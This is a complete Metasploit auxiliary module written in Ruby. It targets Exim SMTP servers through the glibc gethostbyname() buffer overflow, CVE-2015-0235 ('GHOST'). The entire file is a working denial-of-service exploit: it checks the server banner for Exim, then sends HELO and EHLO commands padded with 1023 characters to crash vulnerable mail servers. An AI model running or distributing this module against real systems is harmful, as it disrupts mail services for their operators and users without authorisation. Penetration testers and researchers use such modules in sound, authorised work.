EXIM-ESMTP-GHOST-Exploit.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
    include Msf::Exploit::Remote::Smtp
    include Msf::Auxiliary::Dos
    def initialize
        super(
            'Name'           => 'Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235',
            'Description'    => %q{
                                This module exploits a buffer overflow in Exim SMTP servers version 4.20 or less resulting in a service crash on vulnerable systems.
                        },
            'Author'         => [ '1N3' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1 $'
        )
    end
    def run()
    connect
    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /
      disconnect
      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
    end
    buffer = "0" * 1023
    helo_resp = raw_send_recv("HELO " + buffer + "\r\n")
    helo_resp.each_line do |line|
        print_status("#{rhost}:#{rport} - HELO: #{line.strip}")
    end
    ehlo_resp = raw_send_recv("EHLO " + buffer + "\r\n")
    ehlo_resp.each_line do |line|
        print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
    end
    print_status("Exploit sent!")
    disconnect()
    end
end